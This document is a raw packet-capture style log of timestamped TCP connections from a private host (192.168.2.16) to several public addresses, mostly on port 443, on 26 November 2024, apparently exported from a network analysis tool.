                                                                              Nov 26, 2024 20:54:38.705190897 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:38.705323935 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:38.705336094 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:38.705401897 CET49734443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:38.705413103 CET44349734104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:38.705524921 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:38.705543041 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:38.845482111 CET44349732172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:38.845802069 CET49732443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:38.845827103 CET44349732172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:38.846157074 CET44349732172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:38.846463919 CET49732443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:38.846528053 CET44349732172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:38.846653938 CET49732443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:38.891331911 CET44349732172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:39.289819002 CET44349732172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:39.289891958 CET44349732172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:39.289952993 CET49732443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:39.290694952 CET49732443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:39.290719032 CET44349732172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:39.809257030 CET4968080192.168.2.16192.229.211.108
                                                                              Nov 26, 2024 20:54:39.972605944 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:39.973000050 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:39.973041058 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:39.974064112 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:39.974158049 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:39.975140095 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:39.975198984 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:39.975325108 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:39.975336075 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:39.986530066 CET44349734104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:39.986670017 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:39.987458944 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:39.987478971 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:39.987637997 CET49734443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:39.987648010 CET44349734104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:39.988358974 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:39.988430977 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:39.988501072 CET44349734104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:39.988567114 CET49734443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:39.989478111 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:39.989537954 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:39.989681959 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:39.989691019 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:39.989764929 CET49734443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:39.989844084 CET44349734104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:39.989917040 CET49734443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:39.989924908 CET44349734104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:40.017185926 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.033200026 CET49734443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:40.034384966 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.129251003 CET49678443192.168.2.1620.189.173.10
                                                                              Nov 26, 2024 20:54:40.414974928 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.449415922 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.449456930 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.449513912 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.449553013 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.449604988 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.449817896 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.450602055 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.450638056 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.450673103 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.450684071 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.450719118 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.450725079 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.450735092 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.450788021 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.451421022 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.496232986 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.496269941 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.544246912 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.544266939 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.547538042 CET44349713172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:54:40.547607899 CET44349713172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:54:40.547663927 CET49713443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:54:40.548825026 CET44349734104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:40.548880100 CET44349734104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:40.548934937 CET49734443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:40.549278021 CET49734443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:40.549294949 CET44349734104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:40.550527096 CET49713443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:54:40.550543070 CET44349713172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:54:40.550877094 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:40.550901890 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:40.550980091 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:40.551192999 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:40.551203012 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:40.577652931 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.577883005 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.577908993 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.577938080 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.577965021 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.577979088 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.577996016 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.578022957 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.578047037 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.585910082 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.591242075 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.591341019 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.591348886 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.592191935 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.624644995 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.628545046 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.628624916 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.628652096 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.628669977 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.628711939 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.636528969 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.640211105 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.644388914 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.644490957 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.644515038 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.652245045 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.652513981 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.652558088 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.660105944 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.660181046 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.660200119 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.675765038 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.675844908 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.675889969 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.675905943 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.675956964 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.681848049 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.688653946 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.688680887 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.688760996 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.688771963 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.688818932 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.694190979 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.700290918 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.700391054 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.700402021 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.701680899 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.705869913 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.705940008 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.705956936 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.706404924 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.706461906 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.706473112 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.752227068 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.752259016 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.752278090 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.779098988 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.782744884 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.782840967 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.782856941 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.790344000 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.790421009 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.790430069 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.797662020 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.797749996 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.797756910 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.800173998 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.805341959 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.805411100 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.805421114 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.812714100 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.812797070 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.812809944 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.820156097 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.820254087 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.820267916 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.827682972 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.827747107 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.827761889 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.840513945 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.840523005 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.840559959 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.840574980 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.840588093 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.840589046 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.840605974 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.840625048 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.840636015 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.840655088 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.842410088 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.842472076 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.842483044 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.849916935 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.849972963 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.849982023 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.883239985 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.883249998 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.883296967 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.883322954 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.883361101 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.883379936 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.883419037 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.883430958 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.896188021 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.896199942 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.944201946 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.955813885 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.958261967 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.958348989 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.958349943 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.958388090 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.958848000 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:40.958868027 CET44349735151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:40.958904982 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.959002018 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.959014893 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.966680050 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.966701984 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.966746092 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.966758966 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.966778994 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:40.966798067 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.966825962 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.966978073 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:40.966995001 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:41.107175112 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:41.107234955 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:41.107321978 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:41.107536077 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:41.107553005 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:41.196711063 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:41.196753979 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:41.196821928 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:41.200160027 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:41.200181961 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:41.568217993 CET49673443192.168.2.16204.79.197.203
                                                                              Nov 26, 2024 20:54:41.922610044 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:41.922935009 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:41.922949076 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:41.923293114 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:41.923604965 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:41.923671007 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:41.923739910 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:41.971333981 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.367718935 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.367758989 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.367850065 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.367870092 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.367974997 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.368025064 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.368025064 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.368036985 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.368083000 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.376705885 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.394992113 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.395093918 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.395104885 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.422507048 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.422574043 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.422585011 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.436261892 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.436528921 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:42.436568975 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.437551975 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.437624931 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:42.437906981 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:42.437969923 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.438035965 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:42.438045979 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.464215040 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.467890978 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.468126059 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:42.468147039 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.469026089 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.469096899 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:42.469368935 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:42.469432116 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.469492912 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:42.469497919 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.480207920 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:42.488923073 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.512234926 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:42.544225931 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.544250011 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.564397097 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.564475060 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.564486980 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.564496994 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.564542055 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.573959112 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.577965021 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.578041077 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.578048944 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.597333908 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.597419024 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.597429037 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.597454071 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.597507000 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.606995106 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.618077993 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.618186951 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.618196011 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.626379967 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.626447916 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.626456022 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.636234045 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.636322021 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.636328936 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.643712997 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.643785954 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.643793106 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.652782917 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.652865887 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.652873993 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.659981966 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.660057068 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.660070896 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.665910006 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.666002035 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.666002989 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.666058064 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.666352034 CET49736443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.666361094 CET44349736104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.834064007 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.834093094 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.834181070 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.834357023 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.834450960 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.834522009 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.834605932 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.834619999 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.834772110 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:42.834808111 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:42.950660944 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.950930119 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.950952053 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.950989008 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.951013088 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:42.951070070 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.951102018 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:42.953712940 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.953772068 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.953821898 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:42.953836918 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.954104900 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.954148054 CET44349738104.17.25.14192.168.2.16
